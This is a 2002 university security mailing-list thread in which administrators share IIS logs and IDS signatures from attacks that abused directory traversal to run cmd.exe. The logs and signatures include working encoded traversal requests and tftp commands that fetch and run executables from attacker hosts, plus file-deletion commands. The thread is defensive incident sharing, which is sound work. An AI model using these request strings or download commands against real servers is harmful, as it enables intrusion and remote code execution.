[unisog] increasing cmd.exe port 80/tcp probes

Young, Beth A. youngba at more.net
Tue Jun 4 17:41:29 GMT 2002


We had a server with the Serv-U ftp installed that was done thru a tftp install.   

Partial log of their first part of scan:
68.4.53.105, -, 5/21/02, 15:00:48, W3SVC1, PSYSERVER, 150.200.203.1, 31, 126, 418, 502, 0, GET, /scripts/.%2e/.%2e/winnt/system32/cmd.exe, -, -, /c+dir+v:\,
68.4.53.105, -, 5/21/02, 15:00:48, W3SVC1, PSYSERVER, 150.200.203.1, 31, 126, 418, 502, 0, GET, /scripts/.%2e/.%2e/winnt/system32/cmd.exe, -, -, /c+dir+w:\,
68.4.53.105, -, 5/21/02, 15:00:48, W3SVC1, PSYSERVER, 150.200.203.1, 47, 126, 418, 502, 0, GET, /scripts/.%2e/.%2e/winnt/system32/cmd.exe, -, -, /c+dir+x:\,
68.4.53.105, -, 5/21/02, 15:00:48, W3SVC1, PSYSERVER, 150.200.203.1, 31, 126, 418, 502, 0, GET, /scripts/.%2e/.%2e/winnt/system32/cmd.exe, -, -, /c+dir+y:\,
68.4.53.105, -, 5/21/02, 15:00:48, W3SVC1, PSYSERVER, 150.200.203.1, 47, 126, 418, 502, 0, GET, /scripts/.%2e/.%2e/winnt/system32/cmd.exe, -, -, /c+dir+z:\

Interestingly enough, they started with C: and went all the way thru Z:

68.4.53.105, -, 5/21/02, 16:23:05, W3SVC1, PSYSERVER, 150.200.203.1, 250, 439, 374, 502, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461), -, /c+tftp.exe+"-i"+68.4.53.105+GET+nux.asp+c:\scripts\nux.asp,
68.4.53.105, -, 5/21/02, 16:23:13, W3SVC1, PSYSERVER, 150.200.203.1, 47, 259, 957, 200, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461), -, /c+dir+c:,
68.4.53.105, -, 5/21/02, 16:23:18, W3SVC1, PSYSERVER, 150.200.203.1, 594, 350, 244, 200, 0, GET, /scripts/nux.asp, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461), -, -,

Then somebody came back later and did this:

203.194.8.40, 6/1/02, 8:58:19, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+c:\winnt\system32\tftp.exe+%22-i%22+203.194.8.40+get+TLIST.EXE+c:\TLIST.EXE
203.194.8.40, 6/1/02, 8:58:28, 502, GET, /msadc/..%2f..%2f..%2f..%2f/TLIST.EXE, -
203.194.8.40, 6/1/02, 8:59:15, 404, GET, /msadc/..%2f..%2f..%2f..%2f/KILL.EXE, 321
203.194.8.40, 6/1/02, 8:59:19, 502, GET, /msadc/..%2f..%2f..%2f..%2f/TLIST.EXE, -
203.194.8.40, 6/1/02, 8:59:51, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+c:\winnt\system32\tftp.exe+%22-i%22+203.194.8.40+get+KILL.EXE+c:\KILL.EXE
203.194.8.40, 6/1/02, 9:00:01, 502, GET, /msadc/..%2f..%2f..%2f..%2f/TLIST.exe, -
203.194.8.40, 6/1/02, 9:00:12, 502, GET, /msadc/..%2f..%2f..%2f..%2f/KILL.exe, 321
203.194.8.40, 6/1/02, 9:00:12, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+c:\WINMGNT.EXE%20/h
203.194.8.40, 6/1/02, 9:01:27, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+del+c:\sys.exe
203.194.8.40, 6/1/02, 9:01:35, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+del+c:\WINMGNT.EXE
203.194.8.40, 6/1/02, 9:01:41, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+del+c:\sys.exe
203.194.8.40, 6/1/02, 9:01:57, 200, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+dir+c:\winnt\
203.194.8.40, 6/1/02, 9:02:41, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+dir+c:\winnt\WINMGNT.EXE%20/h

After this was discovered, that site also blocked tftp at the border.

Beth


>-----Original Message-----
>From: Mike Iglesias [mailto:iglesias at draco.acs.uci.edu]
>Sent: Tuesday, June 04, 2002 12:06 PM
>To: Jeff Anderson-Lee
>Cc: unisog at sans.org
>Subject: Re: [unisog] increasing cmd.exe port 80/tcp probes 
>
>
>We're seeing much more scanning on port 80 than usual, and 
>when a vulnerable
>IIS server is found they try to get it to tftp a file (we have tftp
>blocked at the border so it doesn't work).
>
>Here are some of the patterns our IDS picked up:
>
>HEAD /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/ HTTP/1.0
>HEAD 
>/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
>/ HTTP/1.0
>GET 
>/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1
>
>and then this one was used recently to start the tftp...
>
>GET 
>/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+c:\winnt\s
>ystem32\tftp.exe+"-i"+Data2k.homeftp.net+get+WINMGNT.EXE+c:\WIN
>MGNT.EXE HTTP/1.1{D}{A}
>
>data2k.homeftp.net is another name for p5084D684.dip.t-dialin.net (ip
>address 80.132.214.142).
>
>
>Mike Iglesias                          Internet:    
>iglesias at draco.acs.uci.edu
>University of California, Irvine       phone:       949-824-6926
>Network & Academic Computing Services  FAX:         949-824-2069
>



More information about the unisog mailing list